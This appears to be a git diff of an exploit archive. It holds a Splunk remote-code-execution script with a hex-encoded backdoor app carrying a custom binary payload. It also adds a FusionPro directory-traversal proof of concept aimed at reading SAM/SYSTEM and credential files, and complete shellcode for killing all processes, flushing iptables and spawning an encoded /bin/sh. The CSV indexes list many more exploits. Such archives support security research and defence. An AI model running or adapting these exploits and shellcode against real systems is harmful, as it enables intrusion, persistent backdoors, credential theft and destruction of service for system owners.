a751f296746d50eab11d419573e19324a27e1cc240c54fc65bd75b2708adec240942317911b92e3edc3607bcec03ee05c8877f93a59336ea61e99cbd70e6269d433d5f94740e6dc0bca5236ca1a6f70d5f87462dd75f4b82b0ac1e5ecccca359e2e799d191bb5c3e6d37e68a2df433d56d9fc2bc50981c30bb852c64aab6595afc06eafc1a7a3e423db7e5a7f24e25c54b5a00c1ca6e735254041273fd430372abdf410ce5a10cd5e3b3db503a61f77f0e6374163d8be010e6076d5518353bf082a8bc62e9b45412e679208fa26f80b2beeb1ef27c33fefe87cfeee0608e69cc9aff2b8a3afafcdfd0f0f9df4240f5fab099aaff05756e69bc85fe974cfcfe7f21a0fe7fd84c58ffc3c78c76e01fd7d84fc7acf77fa0fba3fa6feaa8ff0ba12aded2d5e4f4d93ab94398cf1fc63bb25ce52fc5dcb8bee7c62e7f3c7f87a870f1e885975c15efab6af2d80bab34f0bb2e1b329b89eb3fe76c0166e9bf668deabfa55a06eaff22588169f753f16e592d2805455ee93fc8e1137ede0adc56374a5f0190a6eb3150fb31930133ffcc664c59400041b4f5e686696ea84c5159c3341c47b7b566c3b42d4a9beb8a61db25bb411bdac624b3d3a45ecc648f3698c7df36f2a6ba069943fb320726eabfeb3b6c9fc5f3b201b3c6ff9a35f6fe1f0c06eaff2218d3ff0218807be95bf8985012d34e083a983688f471a6b8c05789146479a59a9dd7e49576d0617c671688ef0ef951e5f1a3cf7ff58bfafdbbc52c40d169c82b76e039c704e1de3c58d2a63d96059c142cf38680efbaeace0513f53f5dea31bf11c02cfd57cdd1f9bf5542fd5f0c83fa9fad2c039d166b7c40ab1f3cdc7e747febd1c3adca5a276eb90e686407feb72a243d9557b6bfd879b2756f67ed37a95fffceea8be7b5daeaf35af979fce31b3ffb0978feb4faa25c5bbd5946ad7dbf98d2ff87dd647e0660b6fe5b47fb7f96f8fe9f9665e2febf0b61d2f8ffb0fbf749da122674fcd5d88edc3029178b85f4ab51b6c7cd457f1e00964081b940c2a23dea115591b3f9407210a6c3f9ae8f56e07d61ecfbdf33d8035c39c5fedfd9f7bfa6a9e0fbbfc580fb7f7fd08cebfffcf7003f5eff87f7ff16faaff3ef3f51ff17c284fdbfa54f27079db9ff771a9f88034110044190f71bdcff1b419069e0fedf08727e19d9ff7bdafc1f419073ccccfdbff9f59703c76fa4e98300dcff1b41100441100441100441100441100441100441100441100441100441ce86ff0365f75f' + bytes = shell.decode('hex') + f = open('splunk-shell.tar.gz','wb') + f.write(bytes) + f.close() + + if shellcode == "evil": + print "shellcode filename needs to be different - please change it" + exit() + + print '\t==> Adding custom shellcode' + # custom shellcode loading + with open(shellcode, "rb") as binaryfile : + evil_bytes = bytearray(binaryfile.read()) + f = open('evil','w') + f.write(evil_bytes) + f.close() + st = os.stat('evil') + # making the binary executable + os.chmod('evil', st.st_mode | stat.S_IEXEC) + decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz' + p = Popen(decompress_cmd, shell=True, executable='/bin/bash') + p.wait() + move_cmd = 'cp evil splunk-shell/bin/' + p = Popen(move_cmd, shell=True, executable='/bin/bash') + p.wait() + compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/' + p = Popen(compress_cmd, shell=True, executable='/bin/bash') + p.wait() + if path.isfile('splunk-shell.tar.gz'): + print '\t==> Payload Ready! (splunk-shell.tar.gz)' + +def showUsage(): + print '\n\tScript Usage: {} '.format(argv[0]) + print '\tExample: {} http://192.168.4.16:8000 admin changeme shellcode.bin\n'.format(argv[0]) + +if len(argv) != 5: + showUsage() + exit() + +if not path.isfile(gecko_driver_path): + print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:' + print '\t\t==> https://github.com/mozilla/geckodriver/releases' + print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.' + print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n' + exit() + +splunk_target_url = argv[1] +splunk_admin_user = argv[2] +splunk_admin_pass = argv[3] +splunk_shellcode = argv[4] +generatePayload(splunk_shellcode) +exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass) \ No newline at end of file diff --git a/exploits/windows/webapps/46494.py b/exploits/windows/webapps/46494.py new file mode 100755 index 000000000..c74d1447c --- /dev/null +++ b/exploits/windows/webapps/46494.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python + +''' +# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal +# Date: 02/11/2019 +# Exploit Author: 0v3rride +# Vendor Homepage: https://marcom.com/ +# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe +# Version: < 10.0 (version tested was 9.3) +# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler) +# Tested on: Windows +# CVE : 2019-7751 + +Summary +A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution. + +Attack Details +Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. :/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080. + +Vendor Response +The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor. + +Resolution +Thankfully I found some better solutions other than "just delete it". + + Open services.msc + Look for the service named FusionPro Internet Request Handler + Right-click and open the properties Window + Stop the service if it's running + Select disabled startup type + +Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets. + +The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version . +''' + +####################### +# PoC by: 0v3rride # +# DoC: February 2019 # +####################### + +from requests import * +from sys import *; + + +def travel(fullurl): + r = get(fullurl); + print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl)) + print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code)); + print("-" * 80 + "\n[i]: Response Headers:\n"); + + for hdr in r.headers: + print("{}: {}".format(hdr, r.headers[hdr])); + + print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text)); + + +if len(argv) < 3: + print("[i]: Usage -- ./poc : init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android, 45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64, -45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows, +45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows, 45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows, 45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86, 45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows, @@ -10236,6 +10239,7 @@ id,file,description,date,author,type,platform,port 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, +45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows, 45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, @@ -27399,7 +27403,7 @@ id,file,description,date,author,type,platform,port 22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,webapps,php, 22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",webapps,php, 22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,webapps,php, -22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php, +22039,exploits/php/webapps/22039.txt,"Symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php, 22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,webapps,jsp, 22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",webapps,multiple, 22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,webapps,php, @@ -34987,7 +34991,7 @@ id,file,description,date,author,type,platform,port 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80 34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80 34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443 -34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",webapps,php,80 +34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,Wireghoul,webapps,php,80 34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,webapps,multiple,8090 34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",webapps,php, 34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,webapps,php, @@ -40241,6 +40245,7 @@ id,file,description,date,author,type,platform,port 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua, +46489,exploits/hardware/webapps/46489.txt,"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution",2019-03-04,JameelNabbo,webapps,hardware,80 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, @@ -40249,6 +40254,7 @@ id,file,description,date,author,type,platform,port 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80 44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php, +46488,exploits/php/webapps/46488.txt,"zzzphp CMS 1.6.1 - Cross-Site Request Forgery",2019-03-04,"Yang Chenglong",webapps,php,80 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple, 44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80 44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple, @@ -40436,6 +40442,7 @@ id,file,description,date,author,type,platform,port 45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware, 45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware, 45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php, +46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000 45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows, 45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java, 45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64, @@ -40545,6 +40552,7 @@ id,file,description,date,author,type,platform,port 45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php, 45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, 45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, +46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80 45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php, 45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php, 45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx, @@ -40848,6 +40856,7 @@ id,file,description,date,author,type,platform,port 46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80 46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80 +46482,exploits/php/webapps/46482.txt,"OOP CMS BLOG 1.0 - Multiple SQL Injection",2019-03-04,"Mr Winst0n",webapps,php,80 46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80 46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80 40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80 @@ -40879,6 +40888,7 @@ id,file,description,date,author,type,platform,port 46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux, 46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx, 46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80 +46483,exploits/php/webapps/46483.txt,"OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80 46440,exploits/php/webapps/46440.txt,"EI-Tube 3 - SQL Injection",2019-02-21,"Meisam Monsef",webapps,php,80 46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80 46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80 @@ -40930,3 +40940,10 @@ id,file,description,date,author,type,platform,port 46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php, 46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux, 46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php, +46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80 +46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80 +46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows, +46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80 +46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80 +46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80 +46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 8c93ee155..3039e3a16 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -843,6 +843,7 @@ id,file,description,date,author,type,platform 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator 43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 +46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86 44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 @@ -888,9 +889,11 @@ id,file,description,date,author,type,platform 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86 44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86 +46492,shellcodes/linux_x86-64/46492.c,"Linux/x64 - Kill All Processes Shellcode (11 bytes)",2019-03-04,"Aron Mihaljevic",shellcode,linux_x86-64 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm +46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86 diff --git a/shellcodes/linux_x86-64/46492.c b/shellcodes/linux_x86-64/46492.c new file mode 100644 index 000000000..82a73dcc9 --- /dev/null +++ b/shellcodes/linux_x86-64/46492.c @@ -0,0 +1,64 @@ +/* +;Title: Linux/x86_64 - KILL_ALL +;Author: Aron Mihaljevic +;Architecture: Linux x86_64 +;Shellcode Length: 11 bytes + +========DESCTIPTION=========================== + #include + #include + int kill(pid_t pid, int sig); + + +===COMPILATION AND EXECUTION================== + +#nasm -f elf64 kill.nasm -o kill.o + +#ld kill.o -o kill + +=================SHELLCODE================ + +global _start + +section .text + +_start: + + + + + + push 0x3e ; sys kill + pop rax + push -1 ; pid + pop rdi + push 0x9 ; sig kill + pop rsi + syscall + + + +====================FOR C Compile=========================== + + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + +unsigned char code[] = \ +"\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"; + + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/46491.c b/shellcodes/linux_x86/46491.c new file mode 100644 index 000000000..0c9271987 --- /dev/null +++ b/shellcodes/linux_x86/46491.c @@ -0,0 +1,55 @@ +/**********************************************/ +/* linux/x86 iptables -F Length: 43 bytes */ +/* */ +/* 03/01/2019 */ +/* */ +/* Author: Cameron Brown */ +/* */ +/* Email: pwoerTF@gmail.com */ +/**********************************************/ + +global _start + +section .text + +_start: + jmp short get +code: + pop ebx + cdq + mov [ebx+0xe], dl + + lea eax, [ebx+0xf] + push edx + push eax + push ebx + mov ecx, esp + + mov eax, edx + mov al, 0xb + int 0x80 +get: + call code + file: db "/sbin/iptables#-F" + + +-------------------------------------------------- + + +#include +#include + + +unsigned char code[] = \ +"\xeb\x13\x5b\x99\x88\x53\x0e\x8d\x43\x0f\x52\x50\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x23\x2d\x46"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/46493.c b/shellcodes/linux_x86/46493.c new file mode 100644 index 000000000..7e3920a8c --- /dev/null +++ b/shellcodes/linux_x86/46493.c @@ -0,0 +1,99 @@ +/* +; Date: 02/03/2019 +; NOT-Encoder.py +; Author: Daniele Votta +; Description: This program encode shellcode with NOT technique. +; Tested on: i686 GNU/Linux +; Shellcode Length:25 + +#!/usr/bin/python +# Python NOT Encoder + +# Execve /bin/sh +shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" +encoded2 = "" + +print 'Encoded shellcode...' + +for x in bytearray(shellcode): + # NOT Encoding + y = ~x + encoded += '\\x' + encoded += '%02x' % (y & 0xff) + + encoded2 += '0x' + encoded2 += '%02x,' % (y & 0xff) + +print encoded +"\n" +print encoded2 +print 'Len: %d' % len(bytearray(shellcode)) +*/ + +#include +#include + +/* + +; NOT-Decoder.asm +; Author: Daniele Votta +; Description: This program decode shellcode with NOT technique. +; Tested on: i686 GNU/Linux +; Shellcode Length:44 +; JMP | CALL | POP | Techniques + +NOT-Decoder: file format elf32-i386 + +Disassembly of section .text: + +08048080 <_start>: + 8048080: eb 0c jmp 804808e + +08048082 : + 8048082: 5e pop esi + 8048083: 31 c9 xor ecx,ecx + 8048085: b1 19 mov cl,0x19 + +08048087 : + 8048087: f6 16 not BYTE PTR [esi] + 8048089: 46 inc esi + 804808a: e2 fb loop 8048087 + 804808c: eb 05 jmp 8048093 + +0804808e : + 804808e: e8 ef ff ff ff call 8048082 + +08048093 : + 8048093: ce into + 8048094: 3f aas + 8048095: af scas eax,DWORD PTR es:[edi] + 8048096: 97 xchg edi,eax + 8048097: d0 d0 rcl al,1 + 8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss + 804809f: 91 xchg ecx,eax + 80480a0: 76 1c jbe 80480be <__bss_start+0x12> + 80480a2: af scas eax,DWORD PTR es:[edi] + 80480a3: 76 1d jbe 80480c2 <__bss_start+0x16> + 80480a5: ac lods al,BYTE PTR ds:[esi] + 80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a> + 80480a8: 4f dec edi + 80480a9: f4 hlt + 80480aa: 32 .byte 0x32 + 80480ab: 7f .byte 0x7f +[+] Extract Shellcode ... +"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f" + +======================= POC Daniele Votta ======================= +*/ + +/* NOT Encoded Execve /bin/sh */ +unsigned char code[] = \ +"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file